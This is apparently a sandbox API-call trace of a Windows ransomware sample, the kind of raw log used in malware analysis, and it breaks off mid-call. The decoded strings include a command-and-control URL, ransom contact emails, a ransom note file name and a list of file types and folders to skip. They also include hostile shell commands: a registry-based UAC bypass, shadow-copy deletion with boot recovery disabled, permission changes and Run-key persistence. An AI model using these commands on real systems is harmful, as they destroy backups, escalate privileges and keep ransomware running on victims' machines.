0x77386b0e [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 
[0100.766] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0100.766] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0100.872] GetACP () returned 0x4e4 [0100.872] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0100.872] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe")) returned 0x34 [0100.872] GetTickCount () returned 0x241a1 [0100.872] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=15766100534) returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x77\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x59\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: 
lpWideCharStr="\x62\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x35\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x57\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4d\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x58\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x43\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4f\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x50\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: 
CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x34\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x58\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x64\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0100.872] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0100.872] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0100.872] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0100.872] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0100.872] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0100.872] SizeofResource 
(hModule=0x400000, hResInfo=0x51c308) returned 0xef [0100.872] LockResource (hResData=0x50d55c) returned 0x50d55c [0100.873] FreeResource (hResData=0x50d55c) returned 0 [0100.873] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0100.873] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0100.873] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0100.873] LockResource (hResData=0x50d64c) returned 0x50d64c [0100.873] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0100.873] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1384f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0100.873] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1384f60, cbMultiByte=38, lpWideCharStr=0x137de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0100.873] FreeResource (hResData=0x50d64c) returned 0 [0100.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0100.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1384f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0100.873] GetCurrentThreadId () returned 0xc44 [0100.873] GetCurrentThreadId () returned 0xc44 [0100.873] GetCurrentThreadId () returned 0xc44 [0100.873] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x133cd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0100.873] MultiByteToWideChar (in: CodePage=0x4e4, 
dwFlags=0x0, lpMultiByteStr=0x133cd18, cbMultiByte=239, lpWideCharStr=0x1342e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0100.873] GetCurrentThreadId () returned 0xc44 [0100.873] GetCurrentThreadId () returned 0xc44 [0100.873] GetCurrentThreadId () returned 0xc44 [0100.873] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0100.873] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x133accc, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0100.873] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x133accc, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0100.873] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x133ace4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0100.875] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x133ace4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0100.876] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x133ace4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0100.877] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x133ace4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0100.877] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x133ace4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0100.878] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x133ace4, 
csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0100.879] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x133ace4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0100.879] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x133ace4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0100.880] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x133ace4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0100.882] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x133accc, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0100.882] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x133accc, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0100.882] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x133accc, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0100.882] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x133accc, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0100.882] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0100.882] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0100.882] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0100.882] LockResource (hResData=0x50d72c) returned 0x50d72c [0100.882] FreeResource (hResData=0x50d72c) returned 0 [0100.882] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0100.882] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0100.882] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0100.882] LockResource (hResData=0x50d64c) returned 0x50d64c [0100.882] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1385008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0100.882] MultiByteToWideChar 
(in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1385008, cbMultiByte=38, lpWideCharStr=0x137deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0100.882] FreeResource (hResData=0x50d64c) returned 0 [0100.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0100.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x138500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0100.882] GetCurrentThreadId () returned 0xc44 [0100.882] GetCurrentThreadId () returned 0xc44 [0100.882] GetCurrentThreadId () returned 0xc44 [0100.882] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1340e48, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0100.882] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1340e48, cbMultiByte=1410, lpWideCharStr=0x133accc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy 
ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0100.883] GetCurrentThreadId () returned 0xc44 [0100.883] GetCurrentThreadId () returned 0xc44 [0100.883] GetCurrentThreadId () returned 0xc44 [0100.883] GetCurrentThread () returned 0xfffffffe [0100.883] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0100.883] GetLastError () returned 0x3f0 [0100.883] GetCurrentProcess () returned 0xffffffff [0100.883] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0100.883] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x133ee10, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x133ee10, ReturnLength=0x12fc60) returned 1 [0100.883] CloseHandle (hObject=0xb8) returned 1 [0100.883] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, 
nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x2364d0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0100.883] EqualSid (pSid1=0x2364d0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x133ee74*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0100.883] EqualSid (pSid1=0x2364d0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x133ee90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0100.883] EqualSid (pSid1=0x2364d0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x133ee9c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0100.883] GetCurrentProcess () returned 0xffffffff [0100.883] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0100.883] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0100.883] GetLastError () returned 0x7a [0100.883] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x237770 [0100.883] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, 
TokenInformation=0x237770, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x237770, ReturnLength=0x12fc64) returned 1 [0100.883] GetSidSubAuthorityCount (pSid=0x237778*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x237779 [0100.883] GetSidSubAuthority (pSid=0x237778*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x237780 [0100.883] LocalFree (hMem=0x237770) returned 0x0 [0100.883] CloseHandle (hObject=0xb8) returned 1 [0100.883] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0100.883] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0100.884] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0100.884] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0100.884] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0100.884] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0100.884] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0100.884] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0100.884] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0100.884] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0100.884] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0100.884] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0100.885] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0100.885] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0100.885] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0100.885] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0100.885] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0100.885] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0100.885] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0100.885] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0100.885] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0100.885] 
GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0100.886] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0100.886] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0100.886] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0100.886] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0100.886] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0100.886] LockResource (hResData=0x516824) returned 0x516824 [0100.886] FreeResource (hResData=0x516824) returned 0 [0100.886] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0100.886] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0100.886] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0100.886] LockResource (hResData=0x50d64c) returned 0x50d64c [0100.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1385008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0100.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1385008, cbMultiByte=38, lpWideCharStr=0x137deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0100.886] FreeResource (hResData=0x50d64c) returned 0 [0100.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0100.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x138500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0100.886] GetCurrentThreadId () returned 0xc44 [0100.886] GetCurrentThreadId () returned 0xc44 [0100.886] 
GetCurrentThreadId () returned 0xc44 [0100.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x133ee18, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0100.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x133ee18, cbMultiByte=615, lpWideCharStr=0x1344f7c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 